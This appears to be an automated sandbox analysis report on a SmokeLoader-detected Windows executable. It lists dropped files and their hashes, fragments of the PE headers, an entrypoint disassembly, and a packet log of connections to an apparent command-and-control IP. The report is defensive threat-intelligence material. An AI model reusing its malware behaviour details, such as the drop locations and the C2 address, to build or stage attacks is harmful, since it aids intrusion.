SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Reputation:	unknown
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\hivwauv

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	290304
Entropy (8bit):	6.72767352779887
Encrypted:	false
SSDEEP:
MD5:	2D24E3BAA2A16E47BEE10E91381E6391
SHA1:	013B59B2CD69E93694196DFB34FDDC8684CFD619
SHA-256:	FF2E975C649D66476C48AC9FE64455EB0727FEDE676D000728D09D62D2DC6DB4
SHA-512:	BE515895B29390E1C9C44620F7B18C8AE57D08627B8BBF7484B551CCF079011F95BAA78E71C1A2A6280B544DD06444B509B7C9BA126B525D813AFD68010B03E7
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........F..'r..'r..'r..u...'r..u.'r..u.3'r......'r..'s.?'r..u...'r..u.'r..u.'r.Rich.'r.................PE..L...:..c............................j.............@..................................Q......................................L...P........'..............................................................@............................................text............................... ..`.rdata...9.......:..................@..@.data....g...0...&..................@....zomoxolA............B..............@....rsrc....'.......(...F..............@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\srvwauv

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	37994
Entropy (8bit):	6.945410519496557
Encrypted:	false
SSDEEP:
MD5:	C833507635537E50F5E884EB8242FEA0
SHA1:	B2F9169C79F74F8C32ADC2C33C95B5072C2665C3
SHA-256:	DE3B0CEDBB0CE19FED2C76E7B1D160E8580644820EF5EF4D4E843379FD4C6289
SHA-512:	5F5F22BBB9B295B751803F1BDA81302F453F21B669966D8649676B4934045838AA23AFC5AF611290A8296C0FEF00EA37FD80E1932C090DF639861F8204A8DDB4
Malicious:	true
Yara Hits:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: C:\Users\user\AppData\Roaming\srvwauv, Author: Joe Security
Reputation:	unknown
Preview:	MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L.....{e...............H.............1............@..................................................................................................................................................................................................text............................... ...................................................................................................OT.8\4'..1.=.^.W'.;........3...V&....wB);..9...u.L...X.9~..;...kL.&.o0.y....J.~y.jv&.E;;{...^..._UIx.'.0....T..q......B...B...D...P..._u..x2..@y.#t..sL....3....c...@.....U.h.j....g...o]/.h).h...xv.jN...._.ru.}3g....>&p/...@.o_...i.....B..Y..z#B.....^K..#.AC.t.u.9..Wt.u..F......4$.....u.t...p.4$.......&..............K.......P.rV.<$................K.0...u.t.9l]....t$.u.t.8(ph_.U..VW......#}h......$............U4j_Y......{....O.9jTZ........?...._...X.!\....V.e......W

C:\Users\user\AppData\Roaming\srvwauv:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	unknown
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\servicing\Editions\RTFCtrl.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	15460352
Entropy (8bit):	7.999682936687574
Encrypted:	true
SSDEEP:
MD5:	ABE4D520F6E9A645217F922EDB733EC0
SHA1:	072B1DB8887B958A32EBDC789D259B2B7123F597
SHA-256:	38621B80259F9445FF3943E700B8CC9687BB4013765B7E24C78864A89C233B56
SHA-512:	E11628354956C8F55861760234822DDB33DFBDCEEDE8F868C0809DE52E43D590A40D95FBAC311ED0F45B6B03FEA2C2D078CBDC7B5A1BA1DE9F4C9F1583DC1338
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........jw...$...$...$.S.$...$.S.$...$.S.$...$...$...$...$...$...$...$...$...$.S.$...$.S.$...$.S.$...$Rich...$................PE..d....W.e.........." .....b...................................................@............@.........................................P...e.......<............................ ..x....................................................................................text....`.......b.................. ..`.rdata...8.......:...f..............@..@.data....9.......(..................@....pdata..............................@..@.rsrc...............................@..@.reloc..<.... ......................@..B........................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.945410519496557
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	uVQLD8YVk6.exe
File size:	37'994 bytes
MD5:	c833507635537e50f5e884eb8242fea0
SHA1:	b2f9169c79f74f8c32adc2c33c95b5072c2665c3
SHA256:	de3b0cedbb0ce19fed2c76e7b1d160e8580644820ef5ef4d4e843379fd4c6289
SHA512:	5f5f22bbb9b295b751803f1bda81302f453f21b669966d8649676b4934045838aa23afc5af611290a8296c0fef00ea37fd80e1932c090df639861f8204a8ddb4
SSDEEP:	768:3E45SLnQpEhOB/hAGflc5xOXhr7gvexzv36:3E4EqEhOPNfqStgvexzv3
TLSH:	7A03D08A1C219A78FE1542F7169C8FD4533DD8CB61F3AF4D4A36893764CB7B482342A9
File Content Preview:	MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L.....{e...............H.............1............@........................................................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4031a2
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x657B1891 [Thu Dec 14 15:00:33 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	1
OS Version Minor:	0
File Version Major:	1
File Version Minor:	0
Subsystem Version Major:	1
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
call 00007F444082ECF5h
jne 00007F444082ECF8h
je 00007F444082ECF6h
jnp 00007F444082EC98h
and dword ptr [ecx-74FB3B7Dh], ecx
pop esp
and al, FCh
jmp 00007F444082ECFCh
add al, 81h
jmp 00007F444082EC99h
xor dword ptr [eax], eax
add bl, ch
add eax, 04F5EB20h
and byte ptr [edi+eax+75h], dh
add eax, B1D340C7h
rol bh, 1
inc esp
and al, FCh
xor byte ptr [eax], al
add byte ptr [eax], al
sub esp, 04h
jne 00007F444082ECF8h
je 00007F444082ECF6h
int3
dec esi
xchg eax, esi
add eax, dword ptr [ebx+548B04C4h]
and al, FCh
jmp 00007F444082ECF8h
add al, 29h
shr bl, 00000005h
add ch, bl
stc
add al, 02h
jmp 00007F444082ECF7h
or byte ptr [edx], cl
loop 00007F444082ED3Dh
mov byte ptr [ebx+eax+02h], ah
je 00007F444082ECF7h
jne 00007F444082ECF5h
mov cl, B5h
dec edi
push dword ptr [eax+000000A4h]
jne 00007F444082ECF8h
je 00007F444082ECF6h
jnl 00007F444082ECF5h
out 32h, al
mov ecx, dword ptr [esp]
add esp, 04h
jmp 00007F444082ECF8h
aam E1h
dec ebx
mov byte ptr [eax+06F98080h], dl
jl 00007F444082ED5Ch
jmp 00007F444082ECFDh
mov ebx, FB3D8D8Fh
push eax
pop esi
jmp 00007F444082ECF7h
in eax, 96h
jmp 00007F444082ECEAh
cld
jmp 00007F444082ECF8h
leave
loope 00007F444082ED3Dh
mov al, cl
mov byte ptr [edi], cl
mov dh, 48h
add ch, bl
add eax, 4BE1BC8Ch
mov byte ptr [ebx+0DEB01C1h], al
in al, 2Dh
mov ebx, 512B3AE8h
xchg eax, ecx
pop ecx
jmp 00007F444082ECF7h
pop ebx
xor ch, bl
test ebp, 07E50FEBh
sbb byte ptr [edx-15h], cl
mov ecx, 00003159h

Data Directories

Name	Virtual Address	Virtual Size
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8ffe	0x9000	False	0.7551540798611112	data	7.070222172340171	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2023 18:12:16.078862906 CET	49735	80	192.168.2.4	185.215.113.68
Dec 27, 2023 18:12:16.367002010 CET	80	49735	185.215.113.68	192.168.2.4
Dec 27, 2023 18:12:16.367191076 CET	49735	80	192.168.2.4	185.215.113.68
Dec 27, 2023 18:12:16.367486954 CET	49735	80	192.168.2.4	185.215.113.68
Dec 27, 2023 18:12:16.367523909 CET	49735	80	192.168.2.4	185.215.113.68
Dec 27, 2023 18:12:16.655358076 CET	80	49735	185.215.113.68	192.168.2.4
Dec 27, 2023 18:12:16.655373096 CET	80	49735	185.215.113.68	192.168.2.4
Dec 27, 2023 18:12:16.665014982 CET	80	49735	185.215.113.68	192.168.2.4
Dec 27, 2023 18:12:16.669740915 CET	49735	80	192.168.2.4	185.215.113.68
Dec 27, 2023 18:12:16.669784069 CET	49735	80	192.168.2.4	185.215.113.68
Dec 27, 2023 18:12:16.957607031 CET	80	49735	185.215.113.68	192.168.2.4
Dec 27, 2023 18:12:16.957623005 CET	80	49735	185.215.113.68	192.168.2.4
Dec 27, 2023 18:12:17.378969908 CET	80	49735	185.215.113.68	192.168.2.4
Dec 27, 2023 18:12:17.421438932 CET	49735	80	192.168.2.4	185.215.113.68
Dec 27, 2023 18:12:17.523466110 CET	49736	443	192.168.2.4	104.192.141.1
Dec 27, 2023 18:12:17.523494005 CET	443	49736	104.192.141.1	192.168.2.4
Dec 27, 2023 18:12:17.523564100 CET	49736	443	192.168.2.4	104.192.141.1
Dec 27, 2023 18:12:17.524178982 CET	49736	443	192.168.2.4	104.192.141.1
Dec 27, 2023 18:12:17.524190903 CET	443	49736	104.192.141.1	192.168.2.4
Dec 27, 2023 18:12:18.003072023 CET	443	49736	104.192.141.1	192.168.2.4
Dec 27, 2023 18:12:18.003154039 CET	49736	443	192.168.2.4	104.192.141.1
Dec 27, 2023 18:12:18.008697033 CET	49736	443	192.168.2.4	104.192.141.1
Dec 27, 2023 18:12:18.008707047 CET	443	49736	104.192.141.1	192.168.2.4
Dec 27, 2023 18:12:18.008944035 CET	443	49736	104.192.141.1	192.168.2.4
Dec 27, 2023 18:12:18.024403095 CET	49736	443	192.168.2.4	104.192.141.1
Dec 27, 2023 18:12:18.068733931 CET	443	49736	104.192.141.1	192.168.2.4
Dec 27, 2023 18:12:18.381254911 CET	443	49736	104.192.141.1	192.168.2.4
Dec 27, 2023 18:12:18.381331921 CET	443	49736	104.192.141.1	192.168.2.4
Dec 27, 2023 18:12:18.381344080 CET	49736	443	192.168.2.4	104.192.141.1
Dec 27, 2023 18:12:18.381387949 CET	49736	443	192.168.2.4	104.192.141.1
Dec 27, 2023 18:12:18.381601095 CET	49736	443	192.168.2.4	104.192.141.1
Dec 27, 2023 18:12:18.381611109 CET	443	49736	104.192.141.1	192.168.2.4
Dec 27, 2023 18:12:18.381638050 CET	49736	443	192.168.2.4	104.192.141.1
Dec 27, 2023 18:12:18.381643057 CET	443	49736	104.192.141.1	192.168.2.4
Dec 27, 2023 18:12:18.516042948 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:18.516068935 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:18.516129017 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:18.516976118 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:18.516987085 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:18.999788046 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:18.999862909 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.002474070 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.002481937 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.002716064 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.003638983 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.048738956 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.197276115 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.197410107 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.197455883 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.197463989 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.249576092 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.355431080 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.355441093 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.355473995 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.355499983 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.355505943 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.355524063 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.355654001 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.355667114 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.355736017 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.513353109 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.513370037 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.513389111 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.513540983 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.513549089 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.513592958 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.513611078 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.513641119 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.513648033 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.513683081 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.556480885 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.556514978 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.556679964 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.556688070 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.556736946 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.556747913 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.556761980 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.556781054 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.556807041 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.556813002 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.556837082 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.608932018 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.671386957 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.671416044 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.671439886 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.671497107 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.671557903 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.671562910 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.671571970 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.671591043 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.671633005 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.671638012 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.671667099 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.672044039 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.672059059 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.672091007 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.672095060 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.672130108 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.672262907 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.672282934 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.672310114 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.672317982 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.672328949 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.672405005 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.672436953 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.672465086 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.672468901 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.672508001 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.715086937 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.715118885 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.715146065 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.715148926 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.715161085 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.715181112 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.715195894 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.715423107 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.715437889 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.715473890 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.715473890 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.715482950 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.715503931 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.765185118 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.828711987 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.828732967 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.828763962 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.828772068 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.828782082 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.828809977 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.829287052 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.829304934 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.829348087 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.829355001 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.829560041 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.829586983 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.829618931 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.829624891 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.829643011 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.829798937 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.829827070 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.829854965 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.829858065 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.829883099 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.829886913 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.829911947 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.829929113 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.829931974 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.829936028 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.829957962 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.829976082 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.830152988 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.830166101 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.830195904 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.830199003 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.830207109 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.830216885 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.830240011 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.830354929 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.830369949 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.830395937 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.830401897 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.830404997 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.830420971 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.830441952 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.830656052 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.830686092 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.830713987 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.830717087 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.830733061 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.830746889 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.830749989 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.830816984 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.830832005 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.830862045 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.830866098 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.830889940 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.831016064 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.831027985 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.831058979 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.831063032 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.831084967 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.873857021 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.873876095 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.873936892 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.873943090 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.873970985 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.874113083 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.874125957 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.874156952 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.874160051 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.874180079 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.874614000 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.874633074 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.874667883 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.874671936 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.874692917 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.875159979 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.875173092 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.875214100 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.875219107 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.875389099 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.875406027 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.875447035 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.875449896 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.875473022 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.915671110 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.915687084 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.915792942 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.915807009 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.915952921 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.968349934 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.986753941 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.986774921 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.986799955 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.986859083 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.986915112 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.986920118 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.987190962 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.987209082 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.987240076 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.987243891 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.987276077 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:19.987476110 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:19.987488985 CET	443	49737	54.231.140.225	192.168.2.4
